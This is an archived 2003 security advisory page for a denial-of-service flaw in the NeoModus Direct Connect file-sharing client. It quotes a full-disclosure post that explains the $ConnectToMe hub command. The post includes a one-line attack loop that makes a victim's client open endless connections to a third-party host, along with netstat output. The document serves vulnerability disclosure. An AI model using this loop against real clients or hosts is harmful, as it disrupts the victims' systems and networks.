SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   Direct Connect Vendors:   NeoModus
NeoModus Direct Connect Permits Remote Denial of Service Attacks
SecurityTracker Alert ID:  1007186
SecurityTracker URL:  http://securitytracker.com/id/1007186
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 14 2003
Impact:   Denial of service via network

Version(s): 1.0 build 9 tested; possibly the 1.0 build 9.1 version
Description:   A resource consumption vulnerability was reported in the NeoModus Direct Connect file sharing application. A remote user can cause denial of service conditions on the target system.

sec-labs team reported that a remote user can cause a connected target user's system to open a large number of connections to a specified port on a specified host with a command of the following format:

$ConnectToMe <U's username> <D's IP and port>|

This will reportedly cause denial of service conditions on the target user's system.

Only the Windows version was tested.

Impact:   A remote user can cause a large number of connections to be opened by the target user's system, resulting in resource starvation and denial of service conditions.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.neo-modus.com/ (Links to External Site)
Cause:   Resource error, State error
Underlying OS:  Windows (Any)
Underlying OS Comments:  Only the Windows version was tested

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] [sec-labs] Remote Denial of Service vulnerability in NeoModus


--=.fv8TFfM/PC1taS
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit


     sec-labs team proudly presents:
     
     Remote DoS vulnerability in NeoModus Direct Connect 1.0 build 9
     and probably newest version.	  
     by Lord YuP
     13/07/2003



   I. BACKGROUND

     Direct Connect is a windows (i've found also a linux version but
     i don't have time to test it) p2p file-sharing program, well 
     common nowadays.


   II. DESCRIPTION


     Appending to aDe DC Client to Client HandShake looks like:

     	Client <-> Client Communication in DC. 11-05-2002. By aDe 
	---------------------------------------------------------- 

	ACTIVE FILE DOWNLOAD 
	---------------------- 
	D = downloader 
	U = uploader 
	H = hub 

	D>H: $ConnectToMe <U's username> <D's IP and port>|
	H>U: $ConnectToMe <U's username> <D's IP and port>|

	...bla bla ... ;)


     As u can guess, the Direct Connect client after receiving
     "$Connect ToMe..." command from hub, tries to connect to 
     specyfic IP and PORT sent by the Downloader.

     The attacker (evil-downloader) can send infinite requests
     to HUB with specyfic marked ip:port causing DoS attack 
     in the Victim's client. 

     Little example:
     
     Attacker: for (;;) { dc_send("$ConnectToMe victim www.microsoft.com:%d",sample_port++); }

     Client: (runned "netstat -a")
     

	  TCP    jin:1993               JIN:0                  LISTENING
	  TCP    jin:1995               JIN:0                  LISTENING
	  TCP    jin:1996               JIN:0                  LISTENING
	  TCP    jin:2005               JIN:0                  LISTENING
	  TCP    jin:2006               JIN:0                  LISTENING
	  TCP    jin:2007               JIN:0                  LISTENING
	  TCP    jin:2008               JIN:0                  LISTENING
	  TCP    jin:2009               JIN:0                  LISTENING
	  TCP    jin:2010               JIN:0                  LISTENING
	  TCP    jin:2011               JIN:0                  LISTENING
	  TCP    jin:2012               JIN:0                  LISTENING
	  TCP    jin:2013               JIN:0                  LISTENING
	  TCP    jin:2014               JIN:0                  LISTENING
	  TCP    jin:2015               JIN:0                  LISTENING
	  TCP    jin:2016               JIN:0                  LISTENING
	  TCP    jin:2017               JIN:0                  LISTENING
	  TCP    jin:2018               JIN:0                  LISTENING
	  TCP    jin:2019               JIN:0                  LISTENING
	  ...and so on...


   III. IMPACT

     The attacked client may be DoS-ed in case of that internet connection
     can be reseted/stopped, some clients may flood with the "Out of Memory"
     msgboxes in case of that, system may be not working correctly, and DC
     client may be terminated.



-- 
sec-labs team [http://sec-labs.hack.pl]



--=.fv8TFfM/PC1taS
Content-Type: application/pgp-signature

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.0 (GNU/Linux)

iD8DBQE/ErITZ4yD+a7QMvgRAi0NAKCS5mbpl++2jAyb5B9nlq4pNBftiACgjkVF
BWNQrku1u7RaoKQPkN0fuMw=
=lrBY
-----END PGP SIGNATURE-----

--=.fv8TFfM/PC1taS--
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC